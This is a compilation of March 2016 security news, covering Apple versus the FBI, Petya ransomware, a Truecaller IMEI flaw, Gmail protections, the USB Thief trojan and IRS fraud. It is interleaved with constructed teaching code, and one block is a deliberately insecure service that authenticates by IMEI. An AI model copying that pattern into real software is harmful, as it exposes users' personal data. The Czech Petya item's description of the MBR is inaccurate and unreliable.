The FBI tried for two whole months to get into the locked iPhone of the Islamic radical. The attacker, however, had his iPhone set up to wipe itself automatically after ten incorrect passcode entries, which the FBI's security experts were originally unable to deal with.
In February a court therefore ordered Apple to switch that function off, which is not technically possible. The investigators therefore wanted the American software giant to create a "back door" in the iOS operating system, which Apple's management refused.
Apple CEO Tim Cook warned at the time that by implementing such a tool in the mobile platform, the FBI would be able to bypass the security of practically any iPhone or iPad in the future, regardless of whether the device belonged to a terrorist or an ordinary citizen.
Antivirus programs are no match for a new ransomware virus
29.3.2016 Viruses
A new ransomware virus called Petya, which can encrypt data on the hard drive, has begun to spread across the Internet like an avalanche. It worries security experts mainly because it is significantly faster than practically all of its predecessors, which can make it much harder to detect, PC World reports.
Ransomware attacks have become more and more frequent in recent weeks, and they almost always follow the same scenario. The uninvited guest encrypts the data stored on the hard drive. The attackers try to give the owner of the infected machine the impression that they will get their files back after paying a fine, supposedly assessed for using illegal software or the like.
Even after paying the ransom, users did not get their data back. Instead of paying, the virus must be removed from the computer and the data decrypted, which need not be simple at all, and in most cases is not possible at all.
Speed matters
So what makes Petya so exceptional? Most ransomware needs quite a lot of time to encrypt the data on a hard drive, easily several hours. During that time an antivirus program can catch their activity and block them before they do any greater damage on the computer.
That is why Petya works somewhat differently. It does not encrypt all the data on the disk, only the so-called MBR, the master boot record, which is essentially what starts the whole operating system. The computer then cannot access the encrypted record and, instead of Windows, only displays a message demanding a ransom.
Encrypting the MBR does not take the new ransomware several hours; a few seconds are enough. Antivirus programs thus have practically no chance of catching the malicious code. After the first restart, the problem is there.
They want 10,000 CZK for decryption
The extortionists are not modest either: for decryption they demand one bitcoin, which at the current exchange rate is more than 10,000 Czech crowns. Once again it must be stressed that people should under no circumstances pay the sum. The attackers just pocket the money and disappear.
Petya is currently spreading mainly in the USA and neighbouring Germany via unsolicited e-mails. It is more than likely that it will appear in the Czech Republic in the foreseeable future.
Remotely Exploitable Bug in Truecaller Puts Over 100 Million Users at Risk
29.3.2016 Crime
Security researchers have discovered a remotely exploitable vulnerability in the Caller ID app "Truecaller" that could expose the personal details of millions of its users.
Truecaller is a popular service that claims to "search and identify any phone number," as well as helps users block incoming calls or SMSes from phone numbers categorized as spammers and telemarketers.
The service has mobile apps for Android, iOS, Windows, Symbian devices and BlackBerry phones.
The vulnerability, discovered by Cheetah Mobile Security Research Lab, affects Truecaller Android version of the app that has been downloaded more than 100 Million times.
The actual problem resides in the way Truecaller identifies users in its systems.
During installation, the Truecaller Android app asks users to enter their phone number, email address, and other personal details, which are verified by phone call or SMS message. After this, whenever users open the app, no login screen is ever shown again.
This is because Truecaller uses the device's IMEI to authenticate users, according to the researchers.
"Anyone gaining the IMEI of a device will be able to get Truecaller users' personal information (including the phone number, home address, mail box, gender, etc.) and tamper app settings without users' consent, exposing them to malicious phishers," Cheetah Mobile wrote in a blog post.
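The design problem described above, as an added example that is not Truecaller's code: a profile service that accepts the IMEI as a credential, beside a hardened version that proves identity once through the SMS/call verification and then issues a random, revocable session token. Class names, the user record and the IMEI are constructed for the example.

```python
"""Added example (constructed, not Truecaller's code): device-identifier
authentication beside token-based authentication.

Vulnerable: the server treats a device identifier (IMEI) as proof of identity.
Hardened: identity is proven once by the SMS/call verification, after which the
server issues a random bearer token bound to that account and revocable at will.
"""
import hmac
import secrets
from typing import Dict, Optional

# Constructed user directory keyed by phone number (sample data only).
USERS: Dict[str, Dict[str, str]] = {
    "+15550100": {"name": "Alice Example", "imei": "356938035643809",
                  "email": "alice@example.org"},
}


class VulnerableProfileService:
    """Profile lookup by IMEI: anyone who knows the IMEI (printed on the box,
    readable by other apps on the device) can fetch and change the profile."""

    def get_profile(self, imei: str) -> Optional[Dict[str, str]]:
        for user in USERS.values():
            if user["imei"] == imei:
                return user
        return None

    def update_settings(self, imei: str, settings: Dict[str, str]) -> bool:
        user = self.get_profile(imei)
        if user is None:
            return False
        user.update(settings)
        return True


class HardenedProfileService:
    """Session tokens are minted only after phone verification and compared in
    constant time; the IMEI is never used as a credential."""

    def __init__(self) -> None:
        self._pending_codes: Dict[str, str] = {}   # phone -> one-time code
        self._sessions: Dict[str, str] = {}        # token -> phone

    def start_verification(self, phone: str) -> str:
        # In production the code goes out over SMS or a voice call; the demo
        # returns it so the flow can be exercised offline.
        code = f"{secrets.randbelow(10**6):06d}"
        self._pending_codes[phone] = code
        return code

    def finish_verification(self, phone: str, code: str) -> Optional[str]:
        expected = self._pending_codes.get(phone)
        if expected is None or not hmac.compare_digest(expected, code):
            return None
        del self._pending_codes[phone]             # code is single use
        token = secrets.token_urlsafe(32)          # 256 bits of randomness
        self._sessions[token] = phone
        return token

    def _phone_for(self, token: str) -> Optional[str]:
        for stored, phone in self._sessions.items():
            if hmac.compare_digest(stored, token):
                return phone
        return None

    def get_profile(self, token: str) -> Optional[Dict[str, str]]:
        phone = self._phone_for(token)
        return USERS.get(phone) if phone else None

    def update_settings(self, token: str, settings: Dict[str, str]) -> bool:
        user = self.get_profile(token)
        if user is None:
            return False
        user.update(settings)
        return True

    def revoke(self, token: str) -> None:
        """Server-side logout: a stolen token stops working immediately."""
        self._sessions.pop(token, None)


if __name__ == "__main__":
    weak = VulnerableProfileService()
    print("IMEI alone:", weak.get_profile("356938035643809"))
    strong = HardenedProfileService()
    print("IMEI as token:", strong.get_profile("356938035643809"))
    code = strong.start_verification("+15550100")
    token = strong.finish_verification("+15550100", code)
    print("after verification:", strong.get_profile(token))
```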
Cheetah Mobile researchers told The Hacker News that they were able to retrieve personal data belonging to other users with the help of exploit code simply by interacting with Truecaller's servers.
On a successful exploitation of this flaw, the attackers can:
Steal personal information like account name, gender, e-mail, profile pic, home address, and more.
Modify a user's application settings.
Disable spam blockers.
Add entries to a user's blacklist.
Delete a user's blacklist.
Cheetah Mobile informed Truecaller of this flaw, and the company updated their servers as well as released an upgraded version of its Android app on March 22 in order to prevent abuse exploiting this flaw.
Truecaller said in its blog post published Monday that the vulnerability did not compromise any of its user information.
If you haven’t, download the latest version of Truecaller for your Android devices from the Google Play Store Now!
5 Things Google has Done for Gmail Privacy and Security
29.3.2016 Security
Over the past few years, Google has steadily improved the online security and protections of its Gmail users.
Besides two-factor authentication and HTTPS, Google has added new tools and features to Gmail that ensure users' security and privacy, preventing cyber criminals and intelligence agencies from hacking email accounts.
1. Enhanced State-Sponsored Attack Warnings
The Apple vs. FBI case urged every company to beef up its security to protect its services not just from hackers but also from law enforcement.
Google has for a while now had the capability to identify government-backed hackers and notify potentially affected Gmail users so they can take action as soon as possible.
Google recently announced on its blog post that it will alert Gmail users about the possibility of any state-sponsored attack by showing them a full-page warning with instructions about how to stay safe — very hard to miss or neglect.
Meanwhile, the company revealed that over 1 Million Gmail accounts may have been targeted by government-backed hackers so far.
Although Google has warned Gmail users of state-sponsored attackers since 2012, the company neither disclosed the exact number nor explained how it knows of such hacking attacks.
However, Google said that it knows who the targets are – the list often includes "activists, journalists, and policy-makers taking bold stands around the world."
2. SMTP Strict Transport Security (SMTP STS)
A new security feature dubbed "SMTP STS" is awaiting approval at the Internet Engineering Task Force (IETF).
This new email standard is developed in a joint effort by the engineers of top email services including Google, Microsoft, Yahoo!, Comcast, LinkedIn, and 1&1 Mail & Media Development.
SMTP STS has been designed to enhance email security by preventing the Man-in-the-Middle (MitM) and encryption downgrade attacks that have undermined past efforts, like STARTTLS, at making SMTP a more secure protocol.
SMTP Strict Transport Security (SMTP STS) runs on top of the STARTTLS feature to strengthen the SMTP standard.
SMTP STS checks whether the recipient supports SMTP STS and has a valid, up-to-date encryption certificate. If everything checks out, it allows your message to go through. Otherwise, it stops the email from being sent and notifies you of the reason.
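The difference between opportunistic STARTTLS and the strict check described above, as an added example that is not from the article or the IETF draft: a sending MTA that accepts whatever the EHLO response offers, beside one that enforces a recipient policy and refuses to send when STARTTLS is missing, the MX is not listed, or the certificate is mismatched or expired. The policy and greeting structures, field names and host names are constructed for this example and do not follow the draft's wire format.

```python
"""Added example (constructed, not the article's or the IETF draft's code):
why opportunistic STARTTLS can be downgraded and how a strict policy stops it.
"""
from dataclasses import dataclass
from datetime import date
from typing import Tuple


@dataclass
class Policy:
    """Constructed recipient policy: 'enforce' means TLS to a listed MX with a
    valid certificate, or no delivery at all."""
    mode: str                        # "enforce" or "none"
    allowed_mx: Tuple[str, ...] = ()


@dataclass
class ServerGreeting:
    """What the sending MTA learns from EHLO plus the TLS handshake (constructed)."""
    mx_name: str
    advertises_starttls: bool
    cert_subject: str = ""
    cert_not_after: str = "0001-01-01"   # ISO date of certificate expiry


def deliver_opportunistic(greeting: ServerGreeting) -> Tuple[bool, str]:
    """Pre-STS behaviour: use STARTTLS if offered, otherwise fall back to plaintext."""
    if greeting.advertises_starttls:
        return True, "sent over TLS (certificate not verified)"
    return True, "sent in plaintext: STARTTLS not offered"


def deliver_strict(policy: Policy, greeting: ServerGreeting, today: str) -> Tuple[bool, str]:
    """STS behaviour as the article describes it: confirm the recipient supports
    STS, that TLS is available and the certificate is valid and current;
    otherwise hold the message and report the reason."""
    if policy.mode != "enforce":
        return deliver_opportunistic(greeting)
    if not greeting.advertises_starttls:
        return False, "refused: policy requires TLS but STARTTLS was not offered (possible downgrade)"
    if greeting.mx_name not in policy.allowed_mx:
        return False, f"refused: MX {greeting.mx_name} is not listed in the policy"
    if greeting.cert_subject != greeting.mx_name:
        return False, "refused: certificate subject does not match the MX name"
    if date.fromisoformat(greeting.cert_not_after) < date.fromisoformat(today):
        return False, f"refused: certificate expired on {greeting.cert_not_after}"
    return True, "sent over verified TLS"


def downgraded_greeting(greeting: ServerGreeting) -> ServerGreeting:
    """The scenario the article warns about: an on-path party removes the
    STARTTLS capability from the EHLO response, so nothing else about the
    server changes but TLS is no longer offered."""
    return ServerGreeting(greeting.mx_name, False,
                          greeting.cert_subject, greeting.cert_not_after)


if __name__ == "__main__":
    policy = Policy("enforce", ("mx.example.net",))
    honest = ServerGreeting("mx.example.net", True, "mx.example.net", "2017-01-01")
    for label, g in (("honest", honest), ("downgraded", downgraded_greeting(honest))):
        print(label, "opportunistic:", deliver_opportunistic(g))
        print(label, "strict:       ", deliver_strict(policy, g, "2016-03-30"))
```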
3. End-to-End Encryption (via Chrome Extension Only)
Google announced End-to-End encryption for its users almost two years ago, but the feature is still yet to be released.
The idea is to develop a browser extension that ensures users' privacy by implementing the complex yet secure PGP (Pretty Good Privacy) encryption, fully encrypting messages so that no one other than the users exchanging the emails, not even Google, can read them.
With this goal in mind, the browser extension will let users create their private and public encryption keys within their browsers. The public key will be uploaded to Google's servers, while the private key will be stored locally in the browser.
How the End-to-End Chrome Extension Works:
When a user sends an email to another user who has a PGP key, his or her browser will automatically download the other user's public key from the server and encrypt the content of the email.
However, the work is still in progress, and the company has not revealed when it plans to release the browser extension.
Although Google published the source code for its End-to-End Chrome extension on GitHub almost a year ago so that researchers can review it, the stable version is yet to be released.
For now, you can try an alternative method to send encrypted emails. We have written a step-by-step tutorial on how to send end-to-end encrypted emails to others.
Alternatively, you can try the Swiss-based ProtonMail, a free, open source and end-to-end encrypted email service that offers a simple way to maintain secure communications and keep users' personal data safe.
4. Gmail's Red Padlock Alert
Previously there was no way to tell whether a received email had travelled over an encrypted channel or not, so it could have been subject to interception or Man-in-the-Middle (MiTM) attacks.
But last month, Google introduced a security measure in Gmail in the form of a small red padlock next to a sender's email address, to alert users when the message has been sent through an unencrypted channel.
If a Gmail user receives an email from a service that doesn't support TLS encryption, the feature warns by showing an open red lock next to the sender's email address (as shown).
Such unencrypted emails are then routed to spam, improving the security of Gmail users.
5. Google Safe Browsing For A Quick Malware Check
One of Google's recent changes is the expansion of its 'Safe Browsing' notifications.
Malicious links spread via email are an easy way to infect a large number of users by luring them to malicious web pages controlled by hackers.
However, the Safe Browsing feature protects Gmail users by identifying potentially dangerous links in emails.
Automated agents scan the content of emails for spam and malware. Before a link is opened, Gmail inspects the complete mail and, after a quick scan, prevents the user from opening malicious links in the message.
The features Google is adding help protect the privacy of Gmail users and tighten email confidentiality.
FBI Has Successfully Unlocked Terrorist's iPhone Without Apple's Help
29.3.2016 Apple
End of Apple vs. FBI, at least for now, as the FBI has successfully unlocked the iPhone.
Yes, you heard it right. The Federal Bureau of Investigation (FBI) has unlocked the dead terrorist's iPhone 5C involved in the San Bernardino shooting without Apple's help.
After weeks of arguments, the United States government is withdrawing its motion compelling Apple to build a backdoored version of iOS that could help the agency unlock the iPhone of San Bernardino gunman Syed Farook.
The Department of Justice (DOJ) says that the FBI has successfully accessed the iPhone's data with the help of an undisclosed alternative method and that it no longer needs Apple's assistance.
"The government has now successfully accessed the data stored on Farook's iPhone and therefore no longer requires the assistance of Apple," the attorneys wrote in a court filing Monday. "Accordingly, the government hereby requests that the Order Compelling Apple Inc to Assist Agents in Search dated February 16, 2016, be vacated."
Meanwhile, a DoJ spokeswoman said in a statement: "The FBI is currently reviewing the information on the phone, consistent with standard investigatory procedures."
Last week, the DoJ delayed its court hearing against Apple so it could try a possible method of unlocking the iPhone, for which it had hired an "outside party".
At the time, Apple said it did not know of any way to gain access to the iPhone but hoped that the Feds would share with it any information about loopholes in the iPhone that might come to light.
Although the technique the FBI used to crack the iPhone has not been disclosed and likely will not be any time soon, several experts suspect it involved NAND mirroring.
NAND mirroring is a technique in which the contents of the phone's NAND memory chip are copied, and a fresh copy is flashed back onto the chip whenever the maximum number of passcode attempts is exceeded.
With the discovery of the alternative method, the legal battle between the FBI and Apple seems to be over in this particular case, but it does not end the overall battle about privacy and security.
Apple has issued a statement saying the company is committed to continuing its fight for civil liberties and collective security and privacy.
The full statement (via The Verge) from Apple reads:
From the beginning, we objected to the FBI's demand that Apple builds a backdoor into the iPhone because we believed it was wrong and would set a dangerous precedent. As a result of the government's dismissal, neither of these occurred. This case should never have been brought.
We will continue to help law enforcement with their investigations, as we have done all along, and we will continue to increase the security of our products as the threats and attacks on our data become more frequent and more sophisticated.
Apple believes deeply that people in the United States and around the world deserve data protection, security and privacy. Sacrificing one for the other only puts people and countries at greater risk.
This case raised issues which deserve a national conversation about our civil liberties, and our collective security and privacy. Apple remains committed to participating in that discussion.
FBI breaks into San Bernardino shooter’s iPhone
29.3.2016 Apple
The Department of Justice says the FBI has broken into the iPhone used by the San Bernardino shooter and no longer needs Apple's help.
The US Department of Justice (DoJ) announced that it has broken into the San Bernardino shooter's iPhone and accessed the encrypted data stored on the device.
After a long battle between Apple and the FBI, the DoJ no longer needs the company's help to unlock the iPhone 5C used by one of the San Bernardino terrorists.
The DoJ had originally sought to force Apple into providing a method to access the data on the terrorist's iPhone; a couple of weeks ago the DOJ released a brief filing that threatened to force Apple to hand over the iOS source code if it would not help the FBI unlock the San Bernardino shooter's iPhone.
Now The Register (El Reg) has published a filing made Monday to the Central California District Court that confirms prosecutors have successfully extracted data from the iPhone.
“The government has now successfully accessed the data stored on Farook’s iPhone and therefore no longer requires the assistance from Apple Inc. mandated by the court’s order compelling Apple Inc. to assist agents in search, dated February 16, 2016,” reads the DoJ request.
The DoJ hasn’t provided details on the procedure used to break into the San Bernardino shooter ‘s iPhone, nor revealed the name of the firm that supported the FBI in the operation.
Last week security experts speculated the involvement of the Israeli mobile security firm Cellebrite.
Despite the intense legal battle between Apple and FBI, security experts have always confirmed the existence of methods to unlock the iPhone devices.
The data could have been accessed with either hardware or software techniques, which means that in the future the FBI could use the same methods in other cases, as explained by the security expert Jonathan Zdziarski.
If the method used in this case turns out to be a software method, from what I see of the OS, the method could work on newer devices too.
A law enforcement official, speaking to the CNN on condition of anonymity, explained it was “premature” to say whether this method works on other Apple devices. He added that the method used by law enforcement worked on this particular phone, an iPhone 5C running a version of iOS 9 software.
Snowden always declared that the US Government has the technology to crack the security measures implemented by Apple.
Snowden, in a video call at the Blueprint for a Great Democracy conference, accused the FBI of lying, calling its declaration absurd; in reality, he used a more colorful expression.
“The FBI says Apple has the ‘exclusive technical means’ to unlock the phone,” said Snowden in video conference “Respectfully, that’s horse sh*t.”
On the same day, Snowden shared via Twitter a link to an American Civil Liberties Union blog post titled “One of the FBI’s Major Claims in the iPhone Case Is Fraudulent,” which explains that the FBI has the ability to bypass iPhone protection mechanism.
The fact that the FBI was able to successfully crack the phone without Apple’s help demonstrates that tech giants need to improve their efforts to protect users’ privacy.
Petya, ransomware that encrypts the disk's MBR boot record
29.3.2016 Viruses
Milan Šurkala: Because encrypting an entire disk is a very costly operation, the new Petya ransomware takes a much simpler route. It encrypts the MBR boot record on the hard drive, which thus becomes unreadable. The attackers then demand a ransom.
Ransomware (extortion software) attacks are becoming more and more frequent these days. Essentially, malicious code, usually obtained by opening a dangerous e-mail attachment, encrypts the entire hard drive and then demands a ransom from the victim to make the data accessible again. The new Petya ransomware goes about it slightly differently. Instead of the whole disk, it encrypts only its MBR, which says where each file is. The effect on the infected computer is essentially the same, however: it cannot be known where any data are, as if they did not exist.
The peculiarity of this software lies precisely in the fact that it encrypts only the MBR, which it can do practically instantly (the MBR is not exactly a huge structure). The Petya ransomware forces a critical operating system error and makes it restart. Because the MBR is encrypted, the operating system cannot boot and a message demanding a ransom appears. The attackers demand just under one bitcoin, which these days is roughly 10 thousand Czech crowns. Other ransomware methods, because they encrypt the whole disk, can be noticed, since the process takes a long time, is computationally demanding, and the computer can be forcibly shut down before the whole disk is encrypted. Petya spreads via e-mails about job offers that urge the recipient to download an attachment stored on Dropbox. So far this is happening mainly in Germany.
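Both Petya articles above (the PC World summary and this one) describe the same damage: the 512-byte MBR is overwritten so the machine no longer boots. As an added defensive example, not code from either article, the check below parses an MBR, validates its structure (boot signature, partition status bytes, bootable-flag count) and compares its SHA-256 with a recorded baseline, so a boot-sector overwrite is noticed before the next reboot. The sample MBRs are constructed inline; on a real system the bytes would be read from the raw disk device with administrator rights.

```python
"""Added example (constructed, not from either article): structural and
baseline checks for the 512-byte master boot record."""
import hashlib
import struct
from typing import Dict, List

MBR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"
PARTITION_TABLE_OFFSET = 446       # 446 bytes of boot code precede the table


def parse_partitions(mbr: bytes) -> List[Dict[str, int]]:
    """Decode the four 16-byte partition entries: status, CHS start (skipped),
    type, CHS end (skipped), LBA start, sector count."""
    entries = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * i
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", mbr, off)
        entries.append({"status": status, "type": ptype,
                        "lba_start": lba_start, "sectors": sectors})
    return entries


def mbr_problems(mbr: bytes) -> List[str]:
    """Return structural problems; an empty list means the MBR parses as expected."""
    if len(mbr) != MBR_SIZE:
        return [f"wrong length {len(mbr)}, expected {MBR_SIZE}"]
    problems = []
    if mbr[510:512] != BOOT_SIGNATURE:
        problems.append("boot signature 0x55AA missing")
    bootable = 0
    for idx, p in enumerate(parse_partitions(mbr)):
        if p["status"] not in (0x00, 0x80):
            problems.append(f"partition {idx}: invalid status byte {p['status']:#04x}")
        if p["status"] == 0x80:
            bootable += 1
        if p["type"] != 0 and p["sectors"] == 0:
            problems.append(f"partition {idx}: type {p['type']:#04x} but zero length")
    if bootable > 1:
        problems.append("more than one partition flagged bootable")
    return problems


def mbr_fingerprint(mbr: bytes) -> str:
    """SHA-256 of the whole sector, recorded once on a known-good system."""
    return hashlib.sha256(mbr).hexdigest()


def check_against_baseline(mbr: bytes, baseline_hash: str) -> Dict[str, object]:
    """Combine the structural check with the baseline comparison. Any change to
    the boot code alone (valid structure, different hash) still raises an alert."""
    problems = mbr_problems(mbr)
    changed = mbr_fingerprint(mbr) != baseline_hash
    return {"changed": changed, "problems": problems, "alert": changed or bool(problems)}


def build_sample_mbr() -> bytes:
    """Constructed, valid-looking MBR: placeholder boot code, one active NTFS
    (type 0x07) partition at LBA 2048, three empty entries, boot signature."""
    boot_code = b"\xeb\x63\x90" + b"\x00" * 443
    part0 = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07,
                        b"\xfe\xff\xff", 2048, 204800)
    table = part0 + b"\x00" * 48
    return boot_code + table + BOOT_SIGNATURE


def build_overwritten_mbr(mask: int = 0x37) -> bytes:
    """Constructed stand-in for a sector whose contents were replaced: every byte
    XORed with a constant, so neither the signature nor the table parses."""
    return bytes(b ^ mask for b in build_sample_mbr())


if __name__ == "__main__":
    baseline = mbr_fingerprint(build_sample_mbr())
    print("known-good:", check_against_baseline(build_sample_mbr(), baseline))
    print("overwritten:", check_against_baseline(build_overwritten_mbr(), baseline))
```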
FBI eventually hacked the attacker’s iPhone, no longer needs Apple’s help
29.3.2016 Protection Source: Lupa.cz
A curious court case has a curious ending. At least in this round. A number of questions remain unanswered, though.
“The government has now successfully accessed the data stored on Farook’s iPhone and therefore no longer requires the assistance from Apple Inc. mandated by the court order of February 16.” A fresh statement by the U.S. Department of Justice (PDF) confirms that the FBI eventually managed to get past Apple’s protections without Apple’s help.
The authorities have therefore asked the court to vacate the order. The court dispute, which dragged on for several months and in which Apple refused to help the FBI by creating a special version of iOS that would bypass the iPhone’s protection, thus comes to an end.
The department has not yet released any details on the specific method by which it eventually got at the data. It only admitted that the method came from someone outside the FBI, a “third party”. The Israeli daily Yedioth Ahronoth wrote last week that it might be the local company Cellebrite. Both the authorities and the company declined to comment.
It is therefore unclear whether the method can be used only on the particular iPhone of the San Bernardino attacker, or whether it can be used to break into other models as well. Farook, however, had an older 5c model, which lacks newer security features such as the dedicated cryptographic chip, the Secure Enclave (introduced with the A7 processor found, for example, in the 5s). The device runs iOS 9.
The FBI’s success may mean that the unknown third party knows of a security flaw in iPhones that Apple does not know about. That is not good news for Apple or its users. The company might therefore now ask the government to disclose the flaw to it, though it is questionable whether it would succeed.
According to Bloomberg, it could demand the information under the so-called “equities review” process, by which U.S. authorities decide whether to disclose to hardware and software vendors the flaws they find. The rules have exceptions that allow the authorities to withhold discovered flaws if certain conditions are met.
Reporting the potential flaw and letting Apple fix it could complicate the FBI’s life, though. Farook’s phone is not the only one investigators want to get into. They are currently pursuing a number of other court cases in which they demand Apple’s help with unlocking iPhones.
FBI unlocked the terrorist’s iPhone even without Apple’s help
29.3.2016 Protection
U.S. investigators managed to access the contents of the iPhone used by one of the perpetrators of December’s attack in San Bernardino, California, even without the help of Apple, the company that makes the phone. The Department of Justice promptly withdrew its lawsuit against the company, in which it sought to have Apple help unlock the phone. This follows from documents the department filed with the court. The dispute was closely watched because it could have had broader consequences for the protection of personal data.
The department had demanded that Apple provide the Federal Bureau of Investigation (FBI) with a program that would unlock the iPhone 5C owned by Syed Farook. He and his wife shot dead 14 people in San Bernardino and injured another 22. They were subsequently killed in a shootout with police.
The FBI is investigating possible communication between Farook and his wife Tashfeen Malik and the terrorist organisation Islamic State. The phone in question could allegedly contain evidence.
The government "has successfully accessed the data on Farook’s iPhone and therefore no longer needs Apple’s assistance", the documents filed with the court state.
Apple has not yet commented on the new development in the case. It had earlier warned against creating "back doors" into phone contents that could be abused by criminals and governments.
Apple refused to help
Earlier, the department had asked for the court hearing to be postponed because the authorities were about to try a new method that they hoped would give access to the phone’s contents without the manufacturer’s help. The department nevertheless left itself room for a possible court battle with the manufacturer. In this dispute the authorities were supported by relatives of the San Bernardino attack victims.
Apple refused the authorities’ demands because they could set a dangerous precedent, justifying further demands by authorities in the future for access to other citizens’ personal data for all manner of reasons. Security experts, privacy advocates and other leading technology companies such as Google, Facebook and Microsoft sided with Apple in this dispute.
Did the Israelis help?
According to the BBC, the company that helped the FBI with the decryption is probably Cellebrite, headquartered in Israel. The company confirmed to the British broadcaster that it cooperates with U.S. investigators but gave no further details.
On its website, however, Cellebrite states that one of its tools can decode and extract data from an iPhone 5C.
USB Thief, the new USB-based data stealing Trojan
29.3.2016 Virus
USB Thief is a new USB-based data-stealing Trojan discovered by ESET that relies on USB devices to spread and can also infect air-gapped systems.
Security researchers at ESET have discovered a new insidious data-stealer, dubbed USB Thief (Win32/PSW.Stealer.NAI), that relies on USB devices in order to spread itself.
USB Thief is able to infect air-gapped or isolated systems and does not leave any trace of activity on the infected systems.
The malware authors have implemented special mechanisms to protect USB Thief from being detected and analyzed. They also implemented an advanced multi-stage encryption process to protect the Trojan.
“The USB Thief is, in many aspects different from the more common malware types that we’re used to seeing flooding the internet,” wrote Tomáš Gardoň, a malware analyst at ESET.
“This one uses only USB devices for propagation, and it does not leave any evidence on the compromised computer. Its creators also employ special mechanisms to protect the malware from being reproduced or copied, which makes it even harder to detect and analyze.”
The USB Thief Trojan can be stored either as a dynamically linked library (DLL) loaded by a portable application or as the source of a portable application’s plugin.
Removable USB devices are commonly used to store portable versions of common applications such as Firefox, TrueCrypt and Notepad++. When the victim launches the portable application, USB Thief runs in the background.
“Unfortunately, this is not the case with the USB Thief as it uses an uncommon way to trick a user – it benefits from the fact that USB devices often store portable versions of some common applications like Firefox portable, Notepad++ portable, TrueCrypt portable and so on.” continues the post.
The malware resides entirely on the USB device and leaves no trace of its presence. According to the ESET experts, any tool that could be used to breach an air-gapped network must be taken into account.
“Well, taking into account that organizations isolate some of their systems for a good reason,” said Peter Stancik, the security evangelist at ESET. “Any tool capable of attacking these so called air-gapped systems must be regarded as dangerous.” “People should understand the risks associated with USB storage devices obtained from sources that may not be trustworthy.”
How can organizations prevent attacks based on USB Thief from succeeding?
Do not use USB storage devices from sources that may not be trustworthy.
Disable USB ports wherever possible.
Define strict policies to enforce care in the use of USB devices.
Train the staff on cyber threats.
1 million Gmail accounts victim of state-sponsored hacking
28.3.2016 Incident
Google is improving its Gmail warning service to help protect the customers from state-sponsored hacking and surveillance activities.
Google confirmed that one million Gmail accounts might have been targeted by nation-state hackers.
The news is worrying: the company is observing a significant increase in the number of hacking attacks on user email accounts.
Google announced that it is able to identify operations carried out by state-sponsored hackers and that it intends to notify potentially affected customers.
Google hasn’t provided details on the number of affected customers, but it confirmed that the list of victims “often” includes “activists, journalists, and policy-makers taking bold stands around the world.”
Google confirmed that only a limited number of customers are targeted by state-sponsored hackers: fewer than roughly 0.1% of users ever receive such a notification, but the company still considers it critical to inform users about ongoing attacks.
In the past, users received a warning through a pink Warning tab present on top of Gmail urging victims to adopt necessary countermeasures.
Now Google has improved the notification messages using a full-page warning related to state-sponsored hacking.
“Today, we’re launching a new, full-page warning with instructions about how these users can stay safe. They may see these new warnings instead of, or in addition to, the existing ones.”
Google is also improving its “Safe Browsing” security notifications, the mechanism that informs users when they are about to open a suspicious link included in a received email. Users will now receive a full-page warning when they click such a link, whereas in the past the notification was shown only inside the message, before the link was clicked.
“Safe Browsing already protects Gmail users by identifying potentially dangerous links in messages. Starting this week, Gmail users will begin to see warnings if they click these links, further extending this protection to different web browsers and email apps. ” States the security advisory published by Google.
Google is continuing to push email encryption to protect its customers from government surveillance. It is working with IT giants, including Comcast, Microsoft, and Yahoo, to propose a new secure email mechanism.
In recent weeks, Google implemented a mechanism to warn Gmail users when they send or receive email over unsecured connections.
“This has had an immediate, positive effect on Gmail security. In the 44 days since we introduced it, the amount of inbound mail sent over an encrypted connection increased by 25%. We’re very encouraged by this progress! ” states Google.
“Given the relative ease of implementing encryption and its significant benefits for users, we expect to see this progress continue.”
Watch out, IRS Tax Fraud activities on the rise
28.3.2016 Safety
Security experts and government agencies confirm that IRS tax fraud and phishing campaigns are increasing thanks to new techniques and tools.
Internal Revenue Service tax fraud has reached a peak in the last year; crooks are intensifying their activity and adopting new techniques to monetize their efforts.
According to security experts monitoring the phenomenon, tax-related phishing activity is increasing in this period.
This is a critical period in the US, the so-called tax season, which ends on April 18th. In February, an IRS bulletin confirmed a 400 percent surge in tax-related phishing and malware incidents.
“Tax-related phishing is something of an annual phenomenon, but Proofpoint researchers are seeing a degree of sophistication and pervasiveness that sets this year apart,” states a report published by the Proofpoint firm that analyzes tax fraud trends.
Crooks are trying to exploit the new habits of taxpayers, for example their preference for mobile platforms. Security experts observed a mobile-optimized phishing site that poses as a legitimate tax application and targets mobile users.
Proofpoint confirmed that it discovered a number of phishing sites hosted on major providers, which were shut down by the ISPs after their discovery.
Tax-related fraud is considered an emergency by law enforcement; hundreds of thousands of users are potentially at risk.
IRS services have already been abused by cyber criminals to target taxpayers: in May 2015 the Internal Revenue Service suffered a data breach in which hackers “used an online service provided by the agency” to access data for more than 100,000 taxpayers. The IRS issued an official statement on the incident and specified that the compromised system was “Get Transcript,” a service taxpayers could use to obtain a transcript of their tax account transactions online or by mail.
In August 2015, the Internal Revenue Service disclosed a new review of its system, revealing that 334,000 taxpayers (more than three times it initially estimated) may be affected by the hack it announced in May.
In February the IRS detected unauthorized attempts using roughly 464,000 unique SSNs, and 101,000 of those attempts allowed crooks to generate PINs.
The U.S. Internal Revenue Service confirmed that cyber criminals abused the Electronic Filing PIN application running on irs.gov that allows taxpayers to generate a PIN that they can use to file tax returns online.
The latest figures available on the “Get Transcript” hack revealed that 700,000 taxpayers were affected by the data breach; government experts observed 47 million tax transcripts requested under false pretenses, a worrying phenomenon.
This year, security firms and government agencies are observing new and worrying attacks targeting businesses with W-2 phishing campaigns. W-2 information can be used by fraudsters to file the victim’s taxes and request refunds in their name.
Crooks are also attempting tax-related voice phishing in order to obtain information for use in fraudulent activities.
Experts are observing increased interest in the criminal ecosystem in stolen information that could be exploited in tax refund fraud. This precious commodity is also becoming popular in the main black markets on the dark web.
Attackers use this information to abuse the IRS’ electronic filing PIN verification system, file a fake return on the victim’s behalf and request payment to a fraudulent bank account. The FBI confirmed a significant increase in Stolen Identity Refund Fraud (SIRF); the victims of this kind of crime are often specific categories of individuals, such as the homeless and prisoners.
“SIRF is relatively easy to commit and extremely lucrative for criminal actors. While all U.S. taxpayers are susceptible to SIRF, over the past year, criminal actors have targeted specific portions of the population, including: temporary visa holders, the homeless, prisoners, the deceased, low-income individuals, children, senior citizens, and military personnel deployed overseas.” states the FBI.
